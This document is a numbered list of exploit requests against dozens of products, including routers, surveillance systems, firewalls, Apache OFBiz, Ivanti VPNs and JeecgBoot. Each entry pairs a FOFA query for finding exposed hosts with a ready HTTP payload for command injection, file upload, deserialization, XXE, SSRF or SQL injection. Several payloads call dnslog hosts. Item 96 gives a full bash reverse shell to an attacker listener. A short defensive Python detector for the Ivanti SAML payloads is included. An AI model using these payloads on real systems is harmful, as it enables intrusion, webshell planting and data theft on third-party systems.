S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-Server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) campus mobile service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
 "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction engineering quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 (Superdata) software DesignReportSave.jsp interface arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations and maintenance security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 88810
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD
Result URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service washing machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAPPSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 57784

PAYLOAD

93. QiAnXin (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin (奇安信) 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the serialized payload with ysoserial (CommonsBeanutils1 gadget chain; the command only triggers a DNS lookup, so success is checked out of band on the DNS log):

java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Replace [base64 of the payload] in the PoC above with the generated value:

POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 Groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell: start a listener on the attacking host (Kali):

nc -lvp 7777

The Groovy program below runs bash -c with a base64-wrapped command; the base64 decodes to bash -i >& /dev/tcp/192.168.40.128/7777 0>&1 (change address and port to the listener). Because the body is form-encoded, the + and = characters of the base64 are sent as %2B and %3D so the form parser does not turn them into a space or split the value:

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 130

groovyProgram='bash+-c+{echo,YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3IDA%2BJjE%3D}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast HD intelligent recording system busiFacade remote command execution
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

The body is the URL-encoded JSON {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | echo hello"]}; the injected command follows the pipe in the param element.

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
The /../../ segment in the path is the CVE-2023-46805 authentication bypass; %3b (a semicolon) terminates the expected argument and starts the injected command.

GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
The SAML component fetches the key referenced by ds:RetrievalMethod, so a DNS-log or collaborator hostname in the URI confirms the server-side request out of band.

POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 736
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 176
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the XML below; the parameter entity makes the parser fetch the external URL, which shows up on the DNS log:

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

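Both Ivanti requests above hand attacker-controlled XML to the SAML stack, once base64-wrapped in a SAMLRequest form field (103) and once as a raw SOAP signature (102). The Python below is an added example, not code from this page or from Ivanti: it decodes a SAMLRequest (the POST binding is plain base64; the Redirect binding is raw-deflate-then-base64, handled as well) and flags a DTD, an external entity declaration, or a ds:RetrievalMethod pointing at a remote URI, which is what a WAF rule or a log review for these two CVEs has to look for. The two fixtures are copies of the payloads above (the SOAP one shortened to the signature element); they are constructed test input, not live traffic.

```python
import base64
import binascii
import re
import zlib
from urllib.parse import parse_qs, urlsplit

# Fixtures copied from the two requests above (constructed, offline test input).
XXE_BODY = (
    "SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBT"
    "WVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg=="
)
SSRF_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
    '<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">'
    '<ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>'
    '<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/></ds:SignedInfo>'
    '<ds:SignatureValue>qwerty</ds:SignatureValue>'
    '<ds:KeyInfo><ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/></ds:KeyInfo>'
    '</ds:Signature></soap:Body></soap:Envelope>'
)

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
# <!ENTITY [%] name SYSTEM "uri">  or  <!ENTITY [%] name PUBLIC "id" "uri">
ENTITY_RE = re.compile(r'<!ENTITY\s+(?:%\s*)?\w+\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s*"([^"]+)"', re.I)
RETRIEVAL_RE = re.compile(r'<(?:\w+:)?RetrievalMethod\b[^>]*\bURI\s*=\s*"([^"]+)"', re.I)
REMOTE_SCHEMES = {"http", "https", "ftp", "file", "jar", "gopher"}


def decode_saml_request(value):
    """SAMLRequest in the POST binding is base64 of the XML; the Redirect binding
    DEFLATEs it first (raw deflate, no zlib header). Returns the XML text."""
    value = value.replace(" ", "+")              # '+' turned into a space by form decoding
    raw = base64.b64decode(value + "=" * (-len(value) % 4))
    if not raw.lstrip().startswith(b"<"):
        raw = zlib.decompress(raw, -15)          # raw deflate (Redirect binding)
    return raw.decode("utf-8", "replace")


def inspect_xml(xml):
    """Return (kind, uri) findings: a DTD, an external entity, a key fetched from a remote URI."""
    findings = []
    if DOCTYPE_RE.search(xml):
        findings.append(("doctype", None))
    for m in ENTITY_RE.finditer(xml):
        findings.append(("external-entity", m.group(1)))
    for m in RETRIEVAL_RE.finditer(xml):
        uri = m.group(1)
        if urlsplit(uri).scheme.lower() in REMOTE_SCHEMES:
            findings.append(("retrievalmethod-fetch", uri))
    return findings


def inspect_request_body(body):
    """Dispatch on the body shape: a form carrying SAMLRequest/SAMLResponse (saml-sso.cgi)
    or raw XML (saml20.ws)."""
    body = body.strip()
    if body.startswith("<"):
        return inspect_xml(body)
    params = parse_qs(body, keep_blank_values=True)
    findings = []
    for value in params.get("SAMLRequest", []) + params.get("SAMLResponse", []):
        try:
            findings += inspect_xml(decode_saml_request(value))
        except (binascii.Error, zlib.error, ValueError):
            findings.append(("undecodable", None))
    return findings
```

A SAML message that merely has a DTD is already outside what a SAML endpoint should accept, so the "doctype" finding alone is worth blocking on; the URI in the entity or RetrievalMethod is the indicator to pivot on in DNS and proxy logs.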
104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
An empty token is accepted, so the status configuration is returned without authentication.

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"topicurl":"getSysStatusCfg","token":""}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
